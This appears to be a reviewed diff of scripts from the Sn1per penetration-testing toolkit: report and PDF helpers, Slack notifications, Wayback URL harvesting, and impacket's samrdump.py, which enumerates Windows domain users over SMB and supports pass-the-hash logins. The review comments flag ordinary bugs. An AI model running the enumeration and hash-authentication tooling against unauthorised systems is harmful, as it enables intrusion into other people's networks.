Designed and built by Andreas Hontzia (<a href="https://www.twitter.com/honze_net">@honze_net</a>).<br/>
</p>
</div>
</footer>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
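Review bot: the `<script>` tags for `jquery-3.3.1.js` and the two DataTables files carry no `integrity` attribute, unlike the Bootstrap assets, so every generated report executes whatever those CDN URLs serve at view time; add SRI hashes to those three scripts or vendor all of the remote assets so reports also render without network access. The pinned versions (jQuery 3.3.1, DataTables 1.10.19, Bootstrap 3.3.7) are several years old and should be reviewed when this file is refreshed. Smaller: the progress-bar widths divide by `/nmaprun/runstats/hosts/@total`, which yields NaN for a run that scanned no hosts, and the `> 1024` offline-host threshold that hides hosts from the "Scanned Hosts" table is hardcoded with no count of how many were hidden. Since this is a vendored third-party file (Creative Commons BY-SA, Andreas Hontzia), the repository should record the upstream version it was copied from.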

601
bin/pyText2pdf.py Normal file

@@ -0,0 +1,601 @@
#! /usr/bin/env python
"""
pyText2Pdf - Python script to convert plain text files into Adobe
Acrobat PDF files with support for arbitrary page breaks etc.
Version 2.0
Author: Anand B Pillai <abpillai at gmail dot com>
"""
# Derived from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/189858
import sys, os
import string
import time
import optparse
import re
LF_EXTRA=0
LINE_END='\015'
# form feed character (^L)
FF=chr(12)
ENCODING_STR = """\
/Encoding <<
/Differences [ 0 /.notdef /.notdef /.notdef /.notdef
/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
/.notdef /.notdef /.notdef /.notdef /space /exclam
/quotedbl /numbersign /dollar /percent /ampersand
/quoteright /parenleft /parenright /asterisk /plus /comma
/hyphen /period /slash /zero /one /two /three /four /five
/six /seven /eight /nine /colon /semicolon /less /equal
/greater /question /at /A /B /C /D /E /F /G /H /I /J /K /L
/M /N /O /P /Q /R /S /T /U /V /W /X /Y /Z /bracketleft
/backslash /bracketright /asciicircum /underscore
/quoteleft /a /b /c /d /e /f /g /h /i /j /k /l /m /n /o /p
/q /r /s /t /u /v /w /x /y /z /braceleft /bar /braceright
/asciitilde /.notdef /.notdef /.notdef /.notdef /.notdef
/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
/dotlessi /grave /acute /circumflex /tilde /macron /breve
/dotaccent /dieresis /.notdef /ring /cedilla /.notdef
/hungarumlaut /ogonek /caron /space /exclamdown /cent
/sterling /currency /yen /brokenbar /section /dieresis
/copyright /ordfeminine /guillemotleft /logicalnot /hyphen
/registered /macron /degree /plusminus /twosuperior
/threesuperior /acute /mu /paragraph /periodcentered
/cedilla /onesuperior /ordmasculine /guillemotright
/onequarter /onehalf /threequarters /questiondown /Agrave
/Aacute /Acircumflex /Atilde /Adieresis /Aring /AE
/Ccedilla /Egrave /Eacute /Ecircumflex /Edieresis /Igrave
/Iacute /Icircumflex /Idieresis /Eth /Ntilde /Ograve
/Oacute /Ocircumflex /Otilde /Odieresis /multiply /Oslash
/Ugrave /Uacute /Ucircumflex /Udieresis /Yacute /Thorn
/germandbls /agrave /aacute /acircumflex /atilde /adieresis
/aring /ae /ccedilla /egrave /eacute /ecircumflex
/edieresis /igrave /iacute /icircumflex /idieresis /eth
/ntilde /ograve /oacute /ocircumflex /otilde /odieresis
/divide /oslash /ugrave /uacute /ucircumflex /udieresis
/yacute /thorn /ydieresis ]
>>
"""
INTRO="""\
%prog [options] filename
PyText2Pdf makes a 7-bit clean PDF file from any input file.
It reads from a named file, and writes the PDF file to a file specified by
the user, otherwise to a file with '.pdf' appended to the input file.
Author: Anand B Pillai."""
class PyText2Pdf(object):
""" Text2pdf converter in pure Python """
def __init__(self):
# version number
self._version="1.3"
# iso encoding flag
self._IsoEnc=False
# formfeeds flag
self._doFFs=False
self._progname="PyText2Pdf"
self._appname = " ".join((self._progname,str(self._version)))
# default font
self._font="/Courier"
# default font size
self._ptSize=10
# default vert space
self._vertSpace=12
self._lines=0
# number of characters in a row
self._cols=80
self._columns=1
# page ht
self._pageHt=792
# page wd
self._pageWd=612
# input file
self._ifile=""
# output file
self._ofile=""
# default tab width
self._tab=4
# input file descriptor
self._ifs=None
# output file descriptor
self._ofs=None
# landscape flag
self._landscape=False
# Subject
self._subject = ''
# Author
self._author = ''
# Keywords
self._keywords = []
# Custom regexp for page breaks
self._pagebreakre = None
# marker objects
self._curobj = 5
self._pageObs = [0]
self._locations = [0,0,0,0,0,0]
self._pageNo=0
# file position marker
self._fpos=0
def parse_args(self):
""" Callback function called by argument parser.
Helps to remove duplicate code """
if len(sys.argv)<2:
sys.argv.append('-h')
parser = optparse.OptionParser(usage=INTRO)
parser.add_option('-o','--output',dest='outfile',help='Direct output to file OUTFILE',metavar='OUTFILE')
parser.add_option('-f','--font',dest='font',help='Use Postscript font FONT (must be in standard 14, default: Courier)',
default='Courier')
parser.add_option('-I','--isolatin',dest='isolatin',help='Use ISO latin-1 encoding',default=False,action='store_true')
parser.add_option('-s','--size',dest='fontsize',help='Use font at PTSIZE points (default=>10)',metavar='PTSIZE',default=10)
parser.add_option('-v','--linespace',dest='linespace',help='Use line spacing LINESPACE (deault 12)',metavar='LINESPACE',default=12)
parser.add_option('-l','--lines',dest='lines',help='Lines per page (default 60, determined automatically if unspecified)',default=60, metavar=None)
parser.add_option('-c','--chars',dest='chars',help='Maximum characters per line (default 80)',default=80,metavar=None)
parser.add_option('-t','--tab',dest='tabspace',help='Spaces per tab character (default 4)',default=4,metavar=None)
parser.add_option('-F','--ignoreff',dest='formfeed',help='Ignore formfeed character ^L (i.e, accept formfeed characters as pagebreaks)',default=False,action='store_true')
parser.add_option('-P','--papersize',dest='papersize',help='Set paper size (default is letter, accepted values are "A4" or "A3")')
parser.add_option('-W','--width',dest='width',help='Independent paper width in points',metavar=None,default=612)
parser.add_option('-H','--height',dest='height',help='Independent paper height in points',metavar=None,default=792)
parser.add_option('-2','--twocolumns',dest='twocolumns',help='Format as two columns',metavar=None,default=False,action='store_true')
parser.add_option('-L','--landscape',dest='landscape',help='Format in landscape mode',metavar=None,default=False,action='store_true')
parser.add_option('-R','--regexp',dest='pageregexp',help='Regular expression string to determine page breaks (if supplied, this will be used to split text into pages, instead of using line count)',metavar=None)
parser.add_option('-S','--subject',dest='subject',help='Optional subject for the document',metavar=None)
parser.add_option('-A','--author',dest='author',help='Optional author for the document',metavar=None)
parser.add_option('-K','--keywords',dest='keywords',help='Optional list of keywords for the document (separated by commas)',metavar=None)
optlist, args = parser.parse_args()
# print optlist.__dict__, args
if len(args)==0:
sys.exit('Error: input file argument missing')
elif len(args)>1:
sys.exit('Error: Too many arguments')
self._ifile = args[0]
d = optlist.__dict__
if d.get('isolatin'): self._IsoEnc=True
if d.get('formfeed'): self._doFFs = True
if d.get('twocolumns'): self._columns = 2
if d.get('landscape'): self._landscape = True
self._font = '/' + d.get('font')
psize = d.get('papersize')
if psize=='A4':
self._pageWd=595
self._pageHt=842
elif psize=='A3':
self._pageWd=842
self._pageHt=1190
fsize = int(d.get('fontsize'))
if fsize < 1: fsize = 1
self._ptSize = fsize
lspace = int(d.get('linespace'))
if lspace<1: lspace = 1
self._vertSpace = lspace
lines = int(d.get('lines'))
if lines<1: lines = 1
self._lines = int(lines)
chars = int(d.get('chars'))
if chars<4: chars = 4
self._cols = chars
tab = int(d.get('tabspace'))
if tab<1: tab = 1
self._tab = tab
w = int(d.get('width'))
if w<72: w=72
self._pageWd = w
h = int(d.get('height'))
if h<72: h=72
self._pageHt = h
# Very optional args
author = d.get('author')
if author: self._author = author
subject = d.get('subject')
if subject: self._subject = subject
keywords = d.get('keywords')
if keywords:
self._keywords = keywords.split(',')
pagebreak = d.get('pageregexp')
if pagebreak:
self._pagebreakre = re.compile(pagebreak, re.UNICODE|re.IGNORECASE)
outfile = d.get('outfile')
if outfile: self._ofile = outfile
if self._landscape:
print 'Landscape option on...'
if self._columns==2:
print 'Printing in two columns...'
if self._doFFs:
print 'Ignoring form feed character...'
if self._IsoEnc:
print 'Using ISO Latin Encoding...'
print 'Using font',self._font[1:],'size =', self._ptSize
def writestr(self, str):
""" Write string to output file descriptor.
All output operations go through this function.
We keep the current file position also here"""
# update current file position
self._fpos += len(str)
for x in range(0, len(str)):
if str[x] == '\n':
self._fpos += LF_EXTRA
try:
self._ofs.write(str)
except IOError, e:
print e
return -1
return 0
def convert(self):
""" Perform the actual conversion """
if self._landscape:
# swap page width & height
tmp = self._pageHt
self._pageHt = self._pageWd
self._pageWd = tmp
if self._lines==0:
self._lines = (self._pageHt - 72)/self._vertSpace
if self._lines < 1:
self._lines=1
try:
self._ifs=open(self._ifile)
except IOError, (strerror, errno):
print 'Error: Could not open file to read --->', self._ifile
sys.exit(3)
if self._ofile=="":
self._ofile = os.path.splitext(self._ifile)[0] + '.pdf'
try:
self._ofs = open(self._ofile, 'wb')
except IOError, (strerror, errno):
print 'Error: Could not open file to write --->', self._ofile
sys.exit(3)
print 'Input file=>',self._ifile
print 'Writing pdf file',self._ofile, '...'
self.writeheader()
self.writepages()
self.writerest()
print 'Wrote file', self._ofile
self._ifs.close()
self._ofs.close()
return 0
def writeheader(self):
"""Write the PDF header"""
ws = self.writestr
title = self._ifile
t=time.localtime()
timestr=str(time.strftime("D:%Y%m%d%H%M%S", t))
ws("%PDF-1.4\n")
self._locations[1] = self._fpos
ws("1 0 obj\n")
ws("<<\n")
buf = "".join(("/Creator (", self._appname, " By Anand B Pillai )\n"))
ws(buf)
buf = "".join(("/CreationDate (", timestr, ")\n"))
ws(buf)
buf = "".join(("/Producer (", self._appname, "(\\251 Anand B Pillai))\n"))
ws(buf)
if self._subject:
title = self._subject
buf = "".join(("/Subject (",self._subject,")\n"))
ws(buf)
if self._author:
buf = "".join(("/Author (",self._author,")\n"))
ws(buf)
if self._keywords:
buf = "".join(("/Keywords (",' '.join(self._keywords),")\n"))
ws(buf)
if title:
buf = "".join(("/Title (", title, ")\n"))
ws(buf)
ws(">>\n")
ws("endobj\n")
self._locations[2] = self._fpos
ws("2 0 obj\n")
ws("<<\n")
ws("/Type /Catalog\n")
ws("/Pages 3 0 R\n")
ws(">>\n")
ws("endobj\n")
self._locations[4] = self._fpos
ws("4 0 obj\n")
ws("<<\n")
buf = "".join(("/BaseFont ", str(self._font), " /Encoding /WinAnsiEncoding /Name /F1 /Subtype /Type1 /Type /Font >>\n"))
ws(buf)
if self._IsoEnc:
ws(ENCODING_STR)
ws(">>\n")
ws("endobj\n")
self._locations[5] = self._fpos
ws("5 0 obj\n")
ws("<<\n")
ws(" /Font << /F1 4 0 R >>\n")
ws(" /ProcSet [ /PDF /Text ]\n")
ws(">>\n")
ws("endobj\n")
def startpage(self):
""" Start a page of data """
ws = self.writestr
self._pageNo += 1
self._curobj += 1
self._locations.append(self._fpos)
self._locations[self._curobj]=self._fpos
self._pageObs.append(self._curobj)
self._pageObs[self._pageNo] = self._curobj
buf = "".join((str(self._curobj), " 0 obj\n"))
ws(buf)
ws("<<\n")
ws("/Type /Page\n")
ws("/Parent 3 0 R\n")
ws("/Resources 5 0 R\n")
self._curobj += 1
buf = "".join(("/Contents ", str(self._curobj), " 0 R\n"))
ws(buf)
ws(">>\n")
ws("endobj\n")
self._locations.append(self._fpos)
self._locations[self._curobj] = self._fpos
buf = "".join((str(self._curobj), " 0 obj\n"))
ws(buf)
ws("<<\n")
buf = "".join(("/Length ", str(self._curobj + 1), " 0 R\n"))
ws(buf)
ws(">>\n")
ws("stream\n")
strmPos = self._fpos
ws("BT\n");
buf = "".join(("/F1 ", str(self._ptSize), " Tf\n"))
ws(buf)
buf = "".join(("1 0 0 1 50 ", str(self._pageHt - 40), " Tm\n"))
ws(buf)
buf = "".join((str(self._vertSpace), " TL\n"))
ws(buf)
return strmPos
def endpage(self, streamStart):
"""End a page of data """
ws = self.writestr
ws("ET\n")
streamEnd = self._fpos
ws("endstream\n")
ws("endobj\n")
self._curobj += 1
self._locations.append(self._fpos)
self._locations[self._curobj] = self._fpos
buf = "".join((str(self._curobj), " 0 obj\n"))
ws(buf)
buf = "".join((str(streamEnd - streamStart), '\n'))
ws(buf)
ws('endobj\n')
def writepages(self):
"""Write pages as PDF"""
ws = self.writestr
beginstream=0
lineNo, charNo=0,0
ch, column=0,0
padding,i=0,0
atEOF=0
linebuf = ''
while not atEOF:
beginstream = self.startpage()
column=1
while column <= self._columns:
column += 1
atFF=0
atBOP=0
lineNo=0
# Special flag for regexp page break
pagebreak = False
while lineNo < self._lines and not atFF and not atEOF and not pagebreak:
linebuf = ''
lineNo += 1
ws("(")
charNo=0
while charNo < self._cols:
charNo += 1
ch = self._ifs.read(1)
cond = ((ch != '\n') and not(ch==FF and self._doFFs) and (ch != ''))
if not cond:
# See if this dude matches the pagebreak regexp
if self._pagebreakre and self._pagebreakre.search(linebuf.strip()):
pagebreak = True
linebuf = ''
break
else:
linebuf = linebuf + ch
if ord(ch) >= 32 and ord(ch) <= 127:
if ch == '(' or ch == ')' or ch == '\\':
ws("\\")
ws(ch)
else:
if ord(ch) == 9:
padding =self._tab - ((charNo - 1) % self._tab)
for i in range(padding):
ws(" ")
charNo += (padding -1)
else:
if ch != FF:
# write \xxx form for dodgy character
buf = "".join(('\\', ch))
ws(buf)
else:
# dont print anything for a FF
charNo -= 1
ws(")'\n")
if ch == FF:
atFF=1
if lineNo == self._lines:
atBOP=1
if atBOP:
pos=0
ch = self._ifs.read(1)
pos= self._ifs.tell()
if ch == FF:
ch = self._ifs.read(1)
pos=self._ifs.tell()
# python's EOF signature
if ch == '':
atEOF=1
else:
# push position back by one char
self._ifs.seek(pos-1)
elif atFF:
ch = self._ifs.read(1)
pos=self._ifs.tell()
if ch == '':
atEOF=1
else:
self._ifs.seek(pos-1)
if column < self._columns:
buf = "".join(("1 0 0 1 ",
str((self._pageWd/2 + 25)),
" ",
str(self._pageHt - 40),
" Tm\n"))
ws(buf)
self.endpage(beginstream)
def writerest(self):
"""Finish the file"""
ws = self.writestr
self._locations[3] = self._fpos
ws("3 0 obj\n")
ws("<<\n")
ws("/Type /Pages\n")
buf = "".join(("/Count ", str(self._pageNo), "\n"))
ws(buf)
buf = "".join(("/MediaBox [ 0 0 ", str(self._pageWd), " ", str(self._pageHt), " ]\n"))
ws(buf)
ws("/Kids [ ")
for i in range(1, self._pageNo+1):
buf = "".join((str(self._pageObs[i]), " 0 R "))
ws(buf)
ws("]\n")
ws(">>\n")
ws("endobj\n")
xref = self._fpos
ws("xref\n")
buf = "".join(("0 ", str((self._curobj) + 1), "\n"))
ws(buf)
buf = "".join(("0000000000 65535 f ", str(LINE_END)))
ws(buf)
for i in range(1, self._curobj + 1):
val = self._locations[i]
buf = "".join((string.zfill(str(val), 10), " 00000 n ", str(LINE_END)))
ws(buf)
ws("trailer\n")
ws("<<\n")
buf = "".join(("/Size ", str(self._curobj + 1), "\n"))
ws(buf)
ws("/Root 2 0 R\n")
ws("/Info 1 0 R\n")
ws(">>\n")
ws("startxref\n")
buf = "".join((str(xref), "\n"))
ws(buf)
ws("%%EOF\n")
def main():
pdfclass=PyText2Pdf()
pdfclass.parse_args()
pdfclass.convert()
if __name__ == "__main__":
main()
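Review bot: In `writeheader` the values written into the Info dictionary's string literals (`/Title (`, `/Subject (`, `/Author (`, `/Keywords (`) come straight from the `-S`, `-A`, `-K` options and the input file name with no escaping of `(`, `)` or `\`, so an unbalanced parenthesis in a file name or subject produces a malformed object 1 even though the body text in `writepages` does escape those three characters before `ws(ch)`; route the header strings through the same escaping. Separately, the file is Python 2 only (`print 'Landscape option on...'`, `except IOError, e`, `string.zfill`), so it will not run under a Python 3 interpreter; port it (`print(...)`, `except IOError as e`, `str(val).zfill(10)`) or drop it if nothing in the tree invokes it.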

2
bin/report.py Normal file

@@ -0,0 +1,2 @@
import pdfkit
pdfkit.from_url('/usr/share/sniper/loot/workspace/hulu/sniper-report.html', 'out.pdf')
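Review bot: The workspace (`hulu`) and the output path (`out.pdf`) are hard-coded, so this script only works for one loot directory and writes the PDF into whatever the current directory happens to be; take the workspace or report path as an argument and write the PDF next to the report. If the report HTML includes content captured from scanned hosts, it can carry markup those hosts chose and wkhtmltopdf will follow it when rendering, so pass `--disable-local-file-access` (and consider `--disable-javascript`) through pdfkit's `options` argument so a crafted page in the report cannot pull local files into the generated PDF.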

201
bin/samrdump.py Normal file

@@ -0,0 +1,201 @@
#!/usr/bin/python
# Copyright (c) 2003-2015 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description: DCE/RPC SAMR dumper.
#
# Author:
# Javier Kohen <jkohen@coresecurity.com>
# Alberto Solino (@agsolino)
#
# Reference for:
# DCE/RPC for SAMR
import sys
import logging
import argparse
from impacket.examples import logger
from impacket import version
from impacket.nt_errors import STATUS_MORE_ENTRIES
from impacket.dcerpc.v5 import transport, samr
from impacket.dcerpc.v5.rpcrt import DCERPCException
class ListUsersException(Exception):
pass
class SAMRDump:
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\samr]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\samr]', 445),
}
def __init__(self, protocols = None,
username = '', password = '', domain = '', hashes = None, aesKey=None, doKerberos = False):
if not protocols:
self.__protocols = SAMRDump.KNOWN_PROTOCOLS.keys()
else:
self.__protocols = [protocols]
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def dump(self, addr):
"""Dumps the list of users and shares registered present at
addr. Addr is a valid host name or IP address.
"""
logging.info('Retrieving endpoint list from %s' % addr)
# Try all requested protocols until one works.
entries = []
for protocol in self.__protocols:
protodef = SAMRDump.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
logging.info("Trying protocol %s..." % protocol)
rpctransport = transport.SMBTransport(addr, port, r'\samr', self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, doKerberos = self.__doKerberos)
try:
entries = self.__fetchList(rpctransport)
except Exception, e:
logging.critical(str(e))
else:
# Got a response. No need for further iterations.
break
# Display results.
for entry in entries:
(username, uid, user) = entry
base = "%s (%d)" % (username, uid)
print base + '/FullName:', user['FullName']
print base + '/UserComment:', user['UserComment']
print base + '/PrimaryGroupId:', user['PrimaryGroupId']
print base + '/BadPasswordCount:', user['BadPasswordCount']
print base + '/LogonCount:', user['LogonCount']
if entries:
num = len(entries)
if 1 == num:
logging.info('Received one entry.')
else:
logging.info('Received %d entries.' % num)
else:
logging.info('No entries received.')
def __fetchList(self, rpctransport):
dce = rpctransport.get_dce_rpc()
entries = []
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
try:
resp = samr.hSamrConnect(dce)
serverHandle = resp['ServerHandle']
resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
domains = resp['Buffer']['Buffer']
print 'Found domain(s):'
for domain in domains:
print " . %s" % domain['Name']
logging.info("Looking up users in domain %s" % domains[0]['Name'])
resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
domainHandle = resp['DomainHandle']
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext = enumerationContext)
except DCERPCException, e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user['RelativeId'])
print "Found user: %s, uid = %d" % (user['Name'], user['RelativeId'] )
info = samr.hSamrQueryInformationUser2(dce, r['UserHandle'],samr.USER_INFORMATION_CLASS.UserAllInformation)
entry = (user['Name'], user['RelativeId'], info['Buffer']['All'])
entries.append(entry)
samr.hSamrCloseHandle(dce, r['UserHandle'])
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except ListUsersException, e:
logging.critical("Error listing users: %s" % e)
dce.disconnect()
return entries
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print version.BANNER
parser = argparse.ArgumentParser(add_help = True, description = "This script downloads the list of users for the target system.")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('protocol', choices=SAMRDump.KNOWN_PROTOCOLS.keys(), nargs='?', default='445/SMB', help='transport protocol (default 445/SMB)')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('')
if domain is None:
domain = ''
if options.aesKey is not None:
options.k = True
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
dumper = SAMRDump(options.protocol, username, password, domain, options.hashes, options.aesKey, options.k)
dumper.dump(address)
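Review bot: `dce.disconnect()` in `__fetchList` is only reached on the normal path or when `ListUsersException` is raised, and nothing in this file raises it, so a `DCERPCException` re-raised at `raise` or any other error leaves the DCE/RPC connection open while `dump` moves on to the next protocol; put `dce.disconnect()` in a `finally:` and close `domainHandle` and `serverHandle` with `samr.hSamrCloseHandle` the way the user handle is closed. The file is also a 2015 copy of impacket's `samrdump.py` example in Python 2 syntax (`except Exception, e`, `print base + '/FullName:', ...`), so it fails under Python 3 and will drift from whichever impacket version it imports from; invoking the `samrdump.py` shipped with the installed impacket package avoids carrying a stale vendored copy.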

17
bin/slack.sh Normal file

@@ -0,0 +1,17 @@
#!/bin/bash
# Slack API Integration script for Sn1per
# By @xer0dayz - https://sn1persecurity.com
#
source /usr/share/sniper/sniper.conf 2> /dev/null
source /root/.sniper.conf 2> /dev/null
source /root/.sniper_api_keys.conf 2> /dev/null
MESSAGE="$1"
if [ "$MESSAGE" == "postfile" ]; then
FILENAME="$2"
curl -F "file=@$FILENAME" -F "initial_comment=$FILENAME" -F "channels=$SLACK_CHANNEL" -H "Authorization: Bearer $SLACK_API_TOKEN" https://slack.com/api/files.upload 2> /dev/null > /dev/null
else
curl -X POST -H 'Content-type: application/json' --data "{\"text\":\"$MESSAGE\"}" $SLACK_WEBHOOK_URL 2> /dev/null > /dev/null
fi
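Review bot: `$MESSAGE` is spliced directly into the JSON body (`--data "{\"text\":\"$MESSAGE\"}"`) without escaping, so any message containing a double quote, backslash or newline, which scan output routinely does, produces invalid JSON or lets the text close the `text` field and add keys of its own; build the payload with `jq -n --arg text "$MESSAGE" '{text: $text}'` or `python3 -c 'import json,sys; print(json.dumps({"text": sys.argv[1]}))' "$MESSAGE"`. `$SLACK_WEBHOOK_URL` should be quoted, and with both stdout and stderr sent to `/dev/null` a rejected token or a bad webhook fails silently; use `curl -fsS` and check its exit status so the caller knows the notification was not delivered.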

47
bin/waybackrobots.py Normal file

@@ -0,0 +1,47 @@
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
results = r.json()
if len(results) == 0: # might find nothing
return []
results.pop(0) # The first item is ['timestamp', 'original']
return results
def getpaths(snapshot):
url = 'https://web.archive.org/web/{0}/{1}'.format(snapshot[0], snapshot[1])
robotstext = requests.get(url).text
if 'Disallow:' in robotstext: # verify it's acually a robots.txt file, not 404 page
paths = re.findall('/.*', robotstext)
return paths
return []
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage:\n\tpython3 waybackrobots.py <domain-name>')
sys.exit()
host = sys.argv[1]
snapshots = robots(host)
print('Found %s unique results' % len(snapshots))
if len(snapshots) == 0:
sys.exit()
print('This may take some time...')
pool = Pool(4)
paths = pool.map(getpaths, snapshots)
unique_paths = set()
for i in paths:
unique_paths.update(i)
filename = '%s-robots.txt' % host
with open(filename, 'w') as f:
f.write('\n'.join(unique_paths))
print('[*] Saved results to %s' % filename)
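Review bot: The string literal in `robots()` uses a backslash line-continuation, which removes the newline but keeps whatever indentation precedes `?url=` on the next line as part of the request URL; pass the query as `params={'url': host + '/robots.txt', ...}` and let `requests` encode it. `host` comes straight from `sys.argv[1]` and is also used to name the output file (`'%s-robots.txt' % host`), so a value containing `/` writes outside the working directory; validate it as a hostname first. Neither `requests.get` call sets a `timeout`, `r.json()` raises before the empty-result check if the CDX response body is empty or not JSON, and an exception inside `getpaths` propagates out of `pool.map` and aborts the whole run; catch `requests.RequestException` per snapshot and return `[]`. Finally, `re.findall('/.*', robotstext)` keeps everything after the first slash on each line, trailing comments included, so the saved paths need trimming.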

35
bin/waybackurls.py Normal file

@@ -0,0 +1,35 @@
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
r = requests.get(url)
results = r.json()
return results[1:]
if __name__ == '__main__':
argc = len(sys.argv)
if argc < 2:
print('Usage:\n\tpython3 waybackurls.py <url> <include_subdomains:optional>')
sys.exit()
host = sys.argv[1]
with_subs = False
if argc > 3:
with_subs = True
urls = waybackurls(host, with_subs)
json_urls = json.dumps(urls)
if urls:
filename = '%s-waybackurls.json' % host
with open(filename, 'w') as f:
f.write(json_urls)
print('[*] Saved results to %s' % filename)
else:
print('[-] Found nothing')
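Review bot: The optional `include_subdomains` argument is never honoured: with `python3 waybackurls.py example.com 1` `sys.argv` has three entries, so `argc > 3` is false and `with_subs` stays `False`; the test should be `argc > 2`. The CDX endpoint is fetched over plain `http://`, so the URL list that feeds later scan stages can be altered in transit; use `https://web.archive.org/...`. As in `waybackrobots.py`, `requests.get` has no `timeout`, `r.json()` raises on an empty or non-JSON body before `results[1:]` is evaluated, and the output file name is built from the unvalidated `host` argument.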

168
bin/webscreenshot.js Normal file

@@ -0,0 +1,168 @@
/***
# This file is part of webscreenshot.
#
# Copyright (C) 2014, Thomas Debize <tdebize at mail.com>
# All rights reserved.
#
# webscreenshot is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# webscreenshot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with webscreenshot. If not, see <http://www.gnu.org/licenses/>.
***/
var Page = (function(custom_headers, http_username, http_password) {
var opts = {
width: 1200,
height: 800,
ajaxTimeout: 400,
maxTimeout: 800,
httpAuthErrorCode: 2
};
var requestCount = 0;
var forceRenderTimeout;
var ajaxRenderTimeout;
var page = require('webpage').create();
page.viewportSize = {
width: opts.width,
height: opts.height
};
page.settings.userAgent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36';
page.settings.userName = http_username;
page.settings.password = http_password;
page.customHeaders = custom_headers;
page.onInitialized = function() {
page.customHeaders = {};
};
// Silence confirmation messages and errors
page.onConfirm = page.onPrompt = page.onError = noop;
page.onResourceRequested = function(request) {
requestCount += 1;
clearTimeout(ajaxRenderTimeout);
};
page.onResourceReceived = function(response) {
if (response.stage && response.stage == 'end' && response.status == '401') {
page.failReason = '401';
}
if (!response.stage || response.stage === 'end') {
requestCount -= 1;
if (requestCount === 0) {
ajaxRenderTimeout = setTimeout(renderAndExit, opts.ajaxTimeout);
}
}
};
var api = {};
api.render = function(url, file) {
opts.file = file;
page.open(url, function(status) {
if (status !== "success") {
if (page.failReason && page.failReason == '401') {
// Specific 401 HTTP code hint
phantom.exit(opts.httpAuthErrorCode);
} else {
// All other failures
phantom.exit(1);
}
} else {
forceRenderTimeout = setTimeout(renderAndExit, opts.maxTimeout);
}
});
};
function renderAndExit() {
// Trick to avoid transparent background
page.evaluate(function() {
document.body.bgColor = 'white';
});
page.render(opts.file);
phantom.exit(0);
}
function noop() {}
return api;
});
function main() {
var system = require('system');
var p_url = new RegExp('url_capture=(.*)');
var p_outfile = new RegExp('output_file=(.*)');
var p_header = new RegExp('header=(.*)');
var p_http_username = new RegExp('http_username=(.*)');
var http_username = '';
var p_http_password = new RegExp('http_password=(.*)');
var http_password = '';
var temp_custom_headers = {
// Nullify Accept-Encoding header to disable compression (https://github.com/ariya/phantomjs/issues/10930)
'Accept-Encoding': ' '
};
for(var i = 0; i < system.args.length; i++) {
if (p_url.test(system.args[i]) === true)
{
var URL = p_url.exec(system.args[i])[1];
}
if (p_outfile.test(system.args[i]) === true)
{
var output_file = p_outfile.exec(system.args[i])[1];
}
